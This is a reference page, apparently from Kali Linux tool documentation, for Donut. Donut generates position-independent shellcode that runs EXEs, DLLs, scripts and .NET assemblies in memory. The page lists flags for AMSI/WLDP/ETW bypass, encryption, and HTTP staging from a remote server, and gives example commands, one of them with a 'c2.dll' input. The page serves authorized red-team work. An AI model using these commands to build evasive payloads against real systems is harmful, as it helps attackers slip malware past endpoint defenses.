Exploitationshellcodeposition-independentin-memory-executionencryptionbypassamsiwldp

Donut Shellcode

Donut generates position-independent shellcode that enables in-memory execution of VBScript, JScript, EXE, DLL files, and dotNET assemblies. Modules can be staged from HTTP servers or embedded, with optional encryption and features like AMSI/WLDP patching.

Description

Donut is a shellcode generator designed for in-memory execution of various file types including VBScript, JScript, EXEs, DLLs, and .NET assemblies without writing to disk. It supports HTTP staging of modules or direct embedding in the loader, with optional Chaskey block cipher encryption using a 128-bit random key. After execution, original file references are erased to evade memory scanners.

Key use cases include red team operations for evading detection during payload delivery. It compresses inputs with aPLib, LZNT1, Xpress, or Xpress Huffman, applies entropy to API hashes and strings, patches AMSI and WLDP, modifies command lines for EXEs, and handles exit behaviors to maintain host process persistence. Output formats include binary, Base64, C, Ruby, Python, PowerShell, C#, and hexadecimal.

The tool targets x86, amd64, or both architectures, with options for forking threads, specifying .NET classes/methods, and passing arguments. It supports preserving PE headers, decoy modules for evasion, and configurable bypass levels for AMSI/WLDP/ETW.

How It Works

Donut creates position-independent code (PIC) loaders that load and execute input files entirely in memory. It optionally compresses files using aPLib or Windows compressors like LZNT1/Xpress via RtlCompressBuffer, applies entropy (random names, API hashes, strings), and encrypts modules with 128-bit Chaskey cipher. For .NET, it creates AppDomains and invokes specified classes/methods; for unmanaged code, it executes entry points as threads or processes. AMSI/WLDP are patched at runtime, command lines adjusted, and exit APIs hooked to control process/thread termination. HTTP staging fetches encrypted modules from servers, decrypts them in-memory, and erases traces post-execution.

Installation

bash
sudo apt install donut

Flags

-n,--modnameModule name for HTTP staging. If entropy is enabled, this is generated randomly.
-s,--serverServer that will host the Donut module. Credentials may be provided in the following format: https://username:[email protected]/
-e,--entropyEntropy. 1=None, 2=Use random names, 3=Random names + symmetric encryption (default)
-a,--archTarget architecture : 1=x86, 2=amd64, 3=x86+amd64(default).
-o,--outputOutput file to save loader. Default is "loader.bin"
-f,--formatOutput format. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=Powershell, 7=C#, 8=Hex
-y,--forkCreate a new thread for the loader and continue execution at <offset> relative to the host process's executable.
-x,--exitExit behaviour. 1=Exit thread (default), 2=Exit process, 3=Do not exit or cleanup and block indefinitely
-c,--classOptional class name. (required for .NET DLL)
-i,--inputInput file to execute in-memory.
-p,--argsOptional parameters/command line inside quotations for DLL method/function or EXE.
-z,--compressPack/Compress file. 1=None
-b,--bypassBypass AMSI/WLDP/ETW : 1=None, 2=Abort on fail, 3=Continue on fail.(default)

Examples

Generate shellcode for c2.dll input file with default options.
donut -ic2.dll
Generate x86 shellcode for .NET DLL loader.dll, invoking TestClass.RunProcess with argument notepad.exe.
donut --arch:x86 --class:TestClass --method:RunProcess --args:notepad.exe --input:loader.dll
Generate shellcode for loader.dll using TestClass.RunProcess with arguments calc notepad, staging from HTTP server.
donut -iloader.dll -c TestClass -m RunProcess -p"calc notepad" -s http://remote_server.com/modules/
Default generation of shellcode for an EXE file.
donut example.exe
Generate Base64-encoded shellcode for a DLL.
donut -f 2 example.dll
Generate amd64 shellcode with full entropy and encryption, continuing on AMSI/WLDP bypass failure.
donut -e 3 -b 3 -a 2 example.dll
Updated 2026-04-16kali.org ↗